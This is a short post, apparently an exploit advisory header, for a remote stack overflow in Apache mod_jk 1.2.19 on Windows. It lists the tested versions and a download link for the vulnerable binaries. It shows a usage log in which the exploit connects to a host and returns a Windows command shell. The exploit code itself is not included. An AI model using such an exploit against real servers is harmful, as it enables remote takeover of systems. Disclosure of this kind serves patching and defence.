Title =:: Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit
Author =:: unohope [at] chroot [dot] org
IRC =:: irc.chroot.org #chroot
ScriptName =:: Apache Module mod_jk/1.2.19
Vendor =:: http://tomcat.apache.org/
Download =:: http://archive.apache.org/dist/tomcat/tomcat-connectors/jk/binaries/win32/
Tested on =:: Apache/2.0.58 (Win32) mod_jk/1.2.19
Apache/2.0.59 (Win32) mod_jk/1.2.19
Greets ======:: zha0
#
# [root@wargame tmp]# ./apx-jk_mod-1.2.19
# Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@chroot.org)
#
# usage: ./apx-jk_mod-1.2.19
#
# [root@wargame tmp]# ./apx-jk_mod-1.2.19 192.168.1.78
# Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@chroot.org)
#
# [+] connecting to 192.168.1.78 ...
#
# Trying 192.168.1.78...
# Connected to 192.168.1.78.
# Escape character is '^]'.
# Microsoft Windows XP [.. 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\AppServ\Apache2>
#
No comments:
Post a Comment